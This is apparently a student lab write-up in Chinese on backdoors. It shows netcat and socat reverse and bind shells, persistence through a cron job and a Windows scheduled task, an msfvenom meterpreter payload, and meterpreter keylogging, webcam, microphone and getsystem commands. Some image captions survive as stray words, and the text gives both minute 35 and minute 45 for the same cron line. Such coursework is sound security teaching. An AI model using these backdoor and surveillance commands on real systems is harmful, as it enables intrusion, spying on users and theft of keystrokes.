2018-2019-2 網絡對抗技術 20165305 Exp2 後門原理與實踐
經常使用後門工具
1、Windows得到Linux Shell
在Windows下使用ipconfig查看本機IP
使用ncat.exe程序監聽本機的5305端口
在Kali環境下,使用nc指令的-e選項反向鏈接Windows主機的5305端口
成功得到Kali的shell
以下圖所示
linux
2、Linux得到Windows Shell
在Kali環境中使用ifconfig查看IP:
web
使用nc指令監聽5305端口:
shell
在Windows下,使用ncat.exe程序的-e選項項反向鏈接Kali主機的5305端口:
windows
Kali下能夠看到Windows的命令提示,能夠輸入Windows命令:安全
3、使用nc傳輸數據
Windows下監聽5305端口
Kali下鏈接到Windows的5305端口
創建鏈接以後,就能夠傳輸數據了
以下圖:
網絡
實驗內容
1、使用netcat獲取主機操做Shell,cron啓動
在Windows系統下,監聽5305端口:
tcp
用crontab -e指令編輯一條定時任務
在最後一行添加35 * * * * /bin/netcat 192.168.1.176 5305 -e /bin/sh,意思是在每一個小時的第45分鐘反向鏈接Windows主機的5305端口:工具
當時間到了11點35時,此時已經得到了Kali的shell,能夠輸入指令:ui
2、使用socat獲取主機操做Shell, 任務計劃啓動
在win10系統下,右擊屏幕左下角windows圖標,選擇「計算機管理」。
在任務計劃程序建立任務,填寫任務名稱,並新建一個觸發器。
3d
在操做->程序或腳本中選擇你的socat.exe文件的路徑,在添加參數一欄填寫tcp-listen:5305 exec:cmd.exe,pty,stderr,這個命令的做用是把cmd.exe綁定到端口5305,同時把cmd.exe的stderr重定向到stdout上:
建立完成以後,按Windows+L快捷鍵鎖定計算機,再次打開時,能夠發現以前建立的任務已經開始運行:
此時,在Kali環境下輸入指令socat - tcp:192.168.1.176:5305,這裏的第一個參數-表明標準的輸入輸出,第二個流鏈接到Windows主機的端口,此時能夠發現已經成功得到了一個cmd shell:
3、使用MSF meterpreter生成可執行文件,利用ncat或socat傳送到主機並運行獲取主機Shell
輸入指令
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.91.133 LPORT=5303 -f exe > 20155303_backdoor.exe
生成後門程序:
在Windows下執行ncat.exe -l 5305 > 20165305_backdoor.exe
經過nc指令將生成的後門程序傳送到Windows主機上:
在Kali上使用msfconsole指令進入msf控制檯,使用監聽模塊,設置payload,設置反彈回連的IP和端口:
設置完成後,執行監聽:
運行Windows下的後門程序:
此時Kali上已經得到了Windows主機的鏈接,而且獲得了遠程控制的shell:
4、使用MSF meterpreter生成獲取目標主機音頻、攝像頭、擊鍵記錄等內容
使用record_mic指令能夠截獲一段音頻:
使用webcam_snap指令可使用攝像頭進行拍照:
使用keyscan_start指令開始記錄下擊鍵的過程,使用keyscan_dump指令讀取擊鍵的記錄:
使用screenshot指令能夠進行截屏:
使用getuid指令查看當前用戶,使用getsystem指令進行提權
基礎問題回答
(1)例舉你能想到的一個後門進入到你係統中的可能方式?
密碼破解後門,當本身的祕密強度很弱的話,很容易被別人破解進入本身的系統。
(2)例舉你知道的後門如何啓動起來(win及linux)的方式?
當主機處於睡眠狀態也就是表明着這時沒有人使用電腦時自啓動。
(3)Meterpreter有哪些給你映像深入的功能?
使用netcat獲取主機操做Shell,cron啓動,添加35 * * * * /bin/netcat 192.168.1.176 5305 -e /bin/sh,在每一個小時的第35分鐘反向鏈接Windows主機的5305端口,獲去被控主機的音頻、圖像等
(4)如何發現本身有系統有沒有被安裝後門?
通常就是下載網絡安全的軟件,例如360,實時監控與檢測。
還有就是檢查本身的註冊表裏的信息是否有異常的。
實驗總結
我認爲本次試驗本身的收穫很大。經過本次試驗讓我瞭解了系統中一些簡單的後門,更明白了後門的做用與危害,增強了本身對後門的安全防禦意識。
- 1. 20155330 《網絡對抗》 Exp2 後門原理與實踐
- 2. 20155324《網絡對抗》Exp2 後門原理與實踐
- 3. 20145307陳俊達《網絡對抗》Exp2 後門原理與實踐
- 4. 20155218《網絡對抗》Exp2 後門原理與實踐
- 5. 20155333 《網絡對抗》Exp2 後門原理與實踐
- 6. 20155310《網絡對抗》Exp2 後門原理與實踐
- 7. 20145235李濤《網絡對抗》Exp2 後門原理與實踐
- 8. 2017-2018-2 20155203《網絡對抗技術》Exp2 後門原理與實踐
- 9. 20165214 2018-2019-2 《網絡對抗技術》Exp2 後門原理與實踐 Week4
- 10. 20155204 王昊《網絡對抗技術》EXP2 後門原理與實踐
- 更多相關文章...
- • 網站主機 技術 - 網站主機教程
- • XML 相關技術 - XML 教程
- • Java Agent入門實戰(三)-JVM Attach原理與使用
- • ☆技術問答集錦(13)Java Instrument原理
-
每一个你不满意的现在,都有一个你没有努力的曾经。
- 1. No provider available from registry 127.0.0.1:2181 for service com.ddbuy.ser 解決方法
- 2. Qt5.7以上調用虛擬鍵盤(支持中文),以及源碼修改(可拖動,水平縮放)
- 3. 軟件測試面試- 購物車功能測試用例設計
- 4. ElasticSearch(概念篇):你知道的, 爲了搜索…
- 5. redux理解
- 6. gitee創建第一個項目
- 7. 支持向量機之硬間隔(一步步推導,通俗易懂)
- 8. Mysql 異步複製延遲的原因及解決方案
- 9. 如何在運行SEPM配置嚮導時將不可認的複雜數據庫密碼改爲簡單密碼
- 10. windows系統下tftp服務器使用
- 1. 20155330 《網絡對抗》 Exp2 後門原理與實踐
- 2. 20155324《網絡對抗》Exp2 後門原理與實踐
- 3. 20145307陳俊達《網絡對抗》Exp2 後門原理與實踐
- 4. 20155218《網絡對抗》Exp2 後門原理與實踐
- 5. 20155333 《網絡對抗》Exp2 後門原理與實踐
- 6. 20155310《網絡對抗》Exp2 後門原理與實踐
- 7. 20145235李濤《網絡對抗》Exp2 後門原理與實踐
- 8. 2017-2018-2 20155203《網絡對抗技術》Exp2 後門原理與實踐
- 9. 20165214 2018-2019-2 《網絡對抗技術》Exp2 後門原理與實踐 Week4
- 10. 20155204 王昊《網絡對抗技術》EXP2 後門原理與實踐